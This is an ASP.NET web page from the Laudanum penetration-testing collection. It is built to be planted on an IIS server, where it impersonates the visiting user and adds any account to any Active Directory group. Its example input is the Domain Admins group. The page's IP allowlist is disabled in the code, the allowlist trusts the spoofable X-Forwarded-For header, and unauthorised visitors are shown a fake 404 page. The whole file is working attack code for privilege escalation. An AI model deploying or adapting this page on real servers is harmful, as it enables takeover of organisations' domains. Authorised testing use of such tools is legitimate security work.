<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>

<script runat="server">

/* *****************************************************************************
***
***
***
***
*** Ben Lincoln, 2014
*** Based on the Laudanum Project's shell.aspx file
***
***
***
***
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
***  http://laudanum.secureideas.net
***  laudanum@secureideas.net
***
***  Project Leads:
***         Kevin Johnson <kjohnson@secureideas.net>
***         Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file gives the ability to add users to a domain group
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA  02111-1307, USA.
***
***************************************************************************** */

string tGroup = "";
string tUser = "";
string currentUserID = "";

void die() {
	//HttpContext.Current.Response.Clear();
	HttpContext.Current.Response.StatusCode = 404;
	HttpContext.Current.Response.StatusDescription = "Not Found";
	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
	HttpContext.Current.Server.ClearError();
	HttpContext.Current.Response.End();
}

void Page_Load(object sender, System.EventArgs e) {

	// Check for an IP in the range we want
	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
	
	// check if the X-Fordarded-For header exits
	string remoteIp;
	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
		remoteIp = Request.UserHostAddress;
	} else {
		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
	}

	bool validIp = false;
	foreach (string ip in allowedIps) {
		validIp = (validIp || (remoteIp == ip));
	}
	
	/* uncomment the following block to re-enabled IP-whitelist safety feature */
	/*if (!validIp) {
		die();
	}*/

	try
	{
		currentUserID = System.Web.HttpContext.Current.User.Identity.Name.ToString();
	}
	catch (Exception ex)
	{
		currentUserID = "[ Could not obtain the current authenticated user's ID ]";
	}
	
	if ((Request.Form["targetGroup"] != null) && (Request.Form["newUser"] != null)) {
	// do or do not, there is no try
	//try {
		System.Security.Principal.WindowsImpersonationContext impersonationContext;
		impersonationContext = ((System.Security.Principal.WindowsIdentity)User.Identity).Impersonate();

		tGroup = Request.Form["targetGroup"]; 
		tUser = Request.Form["newUser"]; 
		
		System.DirectoryServices.DirectoryEntry ent = new DirectoryEntry(tGroup);
		
		ent.Properties["member"].Add(tUser);
		
		ent.CommitChanges();
		
		impersonationContext.Undo();
	//}
	//catch (Exception objException)
	//{
	}
}
</script>
<html>
<head><title>Add User To Group Via Impersonation</title></head>
<body onload="document.shell.c.focus()">

<form method="post" name="shell">
<p>
Authenticated ID of user accessing this page: <% = currentUserID %>
</p>
<p>
Target Group Bind String:
<br/>
<input type="text" name="targetGroup" size="200"/>
<br/>
(e.g. <b>LDAP://vln2012.local/CN=Domain Admins,CN=Users,DC=vln2012,DC=local</b>)
<br/>
</p>
<p>
User to Add (Distinguished Name):
<br/>
<input type="text" name="newUser" size="200"/>
<br/>
(e.g. <b>CN=User One,OU=Accounts,DC=vln2012,DC=local</b>)
<br/>
</p>
<input type="submit"><br/>
<p>
Target Group From Previous Operation:<br/>
<pre><% = tGroup.Replace("<", "&lt;") %></pre>
New User From Previous Operation:<br/>
<pre><% = tUser.Replace("<", "&lt;") %></pre>
</p>

</form>

</body>
</html>
